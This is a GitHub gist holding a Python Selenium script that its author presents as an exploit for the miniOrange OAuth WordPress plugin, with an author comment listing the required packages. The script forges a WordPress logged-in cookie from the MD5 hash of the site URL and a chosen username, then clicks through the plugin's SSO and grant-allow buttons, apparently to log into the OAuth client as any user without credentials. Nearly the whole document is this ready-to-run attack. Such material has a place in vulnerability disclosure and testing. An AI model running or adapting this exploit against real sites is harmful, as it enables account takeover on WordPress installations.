Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
#!/usr/bin/python3
import sys
import getopt
import requests
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
from selenium.webdriver.common.by import By
import chromedriver_binary
import hashlib
def main(argv):
client_url = 'https://lana.solutions/vdb/miniorange-oauth-client/'
server_url = 'https://lana.solutions/vdb/miniorange-oauth-server/'
username = 'test'
try:
opts, args = getopt.getopt(argv, 'hc:s:u:', ['client_url=', 'server_url=', 'username='])
except getopt.GetoptError:
print('miniorange_oauth_plugin_vdb_exploit_with_selenium.py -c <client_url> -s <server_url> -u <username>')
sys.exit(2)
for opt, arg in opts:
if opt == '-h':
print('miniorange_oauth_plugin_vdb_exploit_with_selenium.py -c <client_url> -s <server_url> -u <username>')
sys.exit()
elif opt in ('-c', '--client_url'):
client_url = arg
elif opt in ('-s', '--server_url'):
server_url = arg
elif opt in ('-u', '--username'):
username = arg
# format urls
client_url = client_url.rstrip('\/') + '/'
server_url = server_url.rstrip('\/') + '/'
# chrome options
chrome_options = Options()
chrome_options.add_experimental_option('detach', True)
# chrome driver
chrome_driver = webdriver.Chrome(options=chrome_options)
# open oauth server
chrome_driver.get(server_url)
# wp core default cookie hash is md5(siteurl)
wp_cookiehash = hashlib.md5(server_url.rstrip('\/').encode()).hexdigest()
# set wp logged in cookie
chrome_driver.add_cookie({
'name': 'wordpress_logged_in_' + wp_cookiehash,
'value': username + '%7Canything%7Canything%7Canything'
})
# open oauth client
chrome_driver.get(client_url + 'wp-admin')
# click sso button
chrome_driver.find_element(By.CLASS_NAME, 'mo_oauth_button_div').click()
# click grant allow button
chrome_driver.find_element(By.CLASS_NAME, 'grant-allow').click()
if __name__ == '__main__':
main(sys.argv[1:])
@lana-codes
Copy link
Author

lana-codes commented Jun 20, 2022

Packages:
https://pypi.org/project/selenium/
https://pypi.org/project/chromedriver-binary-auto/

Experience with Python packages is required to install the Selenium and ChromeDriver. If you need help, contact us at info@lana.codes

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment